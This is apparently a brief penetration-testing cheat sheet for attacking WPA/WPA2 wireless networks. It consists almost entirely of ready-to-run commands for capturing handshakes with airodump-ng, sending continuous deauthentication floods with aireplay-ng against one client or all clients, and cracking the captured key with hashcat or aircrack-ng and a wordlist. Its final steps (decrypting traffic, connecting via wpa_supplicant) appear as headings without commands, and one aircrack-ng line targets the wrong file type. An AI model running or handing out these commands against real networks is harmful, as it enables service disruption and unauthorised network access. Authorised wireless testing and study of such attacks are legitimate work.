WPA/ WPA2

if 802.11w is in use you need to wait until a client connects and can't deauth them

Deauth Attack:

Attack will requires multiple windows

Window 1:

# start listening and recording traffic
airodump-ng --bssid 30:46:9A:FC:53:C8 -c 2 -w wpa wlan0mon

Window 2:

# deauth specific client traffic: 
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 -h B8:2A:A9:56:95:C8 wlan0mon
# deauth all traffic: 
aireplay-ng -0 0 --bssid 30:46:9A:FC:53:C8 wlan0mon

Crack:

# Hashcat
hcxpcapngtool -o wpa.hc22000 wpa-01.cap
hashcat -m 22000 wpa.hc22000 /usr/share/wordlist.txt

# Aircrack-ng 
aircrack-ng wpa.hc22000 -w /usr/share/wordlist.txt

We can confirm it's cracking using 'airdecap-ng' to decrypt the capture packets:

Connect by creating a wpa.conf file:

Use wpa_supplicant to connect to the wireless network:

Last updated